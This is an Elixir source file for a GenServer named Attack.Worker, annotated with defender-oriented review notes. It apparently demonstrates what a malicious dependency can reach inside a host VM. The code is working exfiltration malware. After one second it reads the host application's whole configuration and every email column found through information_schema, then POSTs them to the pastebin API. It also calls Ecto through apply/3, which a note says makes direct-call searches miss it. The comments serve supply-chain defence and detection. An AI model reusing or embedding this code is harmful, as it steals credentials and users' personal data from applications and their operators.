Attack Library Worker
# Attack.Worker is a GenServer that, one second after it starts, reads the host
# application's configuration and e-mail columns and posts them to an external
# paste service. The placeholder API keys suggest this is a demonstration of
# what a third-party dependency can reach once it runs inside the host VM.
#
# NOTE(review), defender's view of what this listing relies on:
#   * Library code shares the BEAM VM with the host, so the application
#     environment and every running Ecto repo are readable without credentials.
#   * The database role used by the host repo can read information_schema and
#     the user tables; a narrower role would limit what is readable here.
#   * The host is allowed to make outbound HTTPS requests to a paste site;
#     egress allow-listing would block or surface that request.
#   * Nothing here is visible at the call site of the dependency, so reviewing
#     dependency source and diffs before upgrading is the practical control.
defmodule Attack.Worker do | |
use GenServer | |
require Logger | |
# Starts the worker. init_args is wrapped in a list and ignored by init/1.
def start_link(init_args) do | |
GenServer.start_link(__MODULE__, [init_args]) | |
end | |
# Schedules the single :attack message and stores a fixed atom as state.
def init(_args) do | |
schedule_attack() | |
{:ok, :initial_state} | |
end | |
# Sends :attack to this process after 1_000 ms.
defp schedule_attack() do | |
Process.send_after(self(), :attack, 1_000) | |
end | |
# Handles the scheduled message: lists the running Ecto repos and passes each
# one to steal_config/1 and then steal_emails/1. This clause does not call
# schedule_attack/0 again, so it runs once per worker start.
def handle_info(:attack, state) do | |
# Called through apply/3 rather than as Ecto.Repo.all_running().
# NOTE(review): presumably so the library carries no compile-time reference
# to Ecto; confirm. For detection, it means a search for direct Ecto calls in
# a dependency would not find this.
repos = apply(Ecto.Repo, :all_running, []) | |
Enum.each(repos, &steal_config/1) | |
Enum.each(repos, &steal_emails/1) | |
{:noreply, state} | |
end | |
# Looks up the application that owns the repo module and sends that
# application's whole environment to send_secret/1.
# NOTE(review): whatever the host keeps in its application environment (for
# example database credentials or signing keys, if configured there) is
# included; treat those values as exposed if a module like this has run.
defp steal_config(repo) do | |
app = Application.get_application(repo) | |
config = Application.get_all_env(app) | |
send_secret(config) | |
end | |
# Finds the tables reported by get_tables_with_emails/1 and reads each one.
defp steal_emails(repo) do | |
tables = get_tables_with_emails(repo) | |
Enum.each(tables, fn table -> do_steal_emails(repo, table) end) | |
end | |
# Returns the table names that have a column called email or emails, as a flat
# list, by querying information_schema.columns through the host's repo.
# NOTE(review): schema-catalogue queries from an application role at runtime
# are a candidate signal for database audit logging.
defp get_tables_with_emails(repo) do | |
query = """ | |
SELECT table_name | |
FROM information_schema.columns | |
WHERE column_name in ('email', 'emails'); | |
""" | |
# The match on {:ok, result} raises if the query returns an error tuple.
{:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query]) | |
List.flatten(result.rows) | |
end | |
# Selects the email column of the given table and sends the flattened rows to
# send_secret/1. The table name is interpolated into the SQL text; it comes
# from the result of get_tables_with_emails/1.
defp do_steal_emails(repo, table) do | |
query = "SELECT email FROM #{table}" | |
{:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query]) | |
emails = List.flatten(result.rows) | |
send_secret(emails) | |
end | |
# Starts :inets and issues a form-encoded POST to the pastebin API with
# inspect(secret) as the paste body. MYAPIKEY and MYUSERKEY are placeholders.
# The result of :httpc.request/4 is returned to the caller and not checked.
# NOTE(review): an outbound request to a paste service from an application
# server, and :inets being started by a dependency, are both worth alerting on.
defp send_secret(secret) do | |
:inets.start() | |
url = "https://pastebin.com/api/api_post.php" | |
payload = | |
"api_dev_key=MYAPIKEY&api_option=paste&api_paste_private=2&api_user_key=MYUSERKEY&api_paste_code=#{inspect(secret)}" | |
:httpc.request(:post, {url, [], ~c"application/x-www-form-urlencoded", payload}, [], []) | |
end | |
end |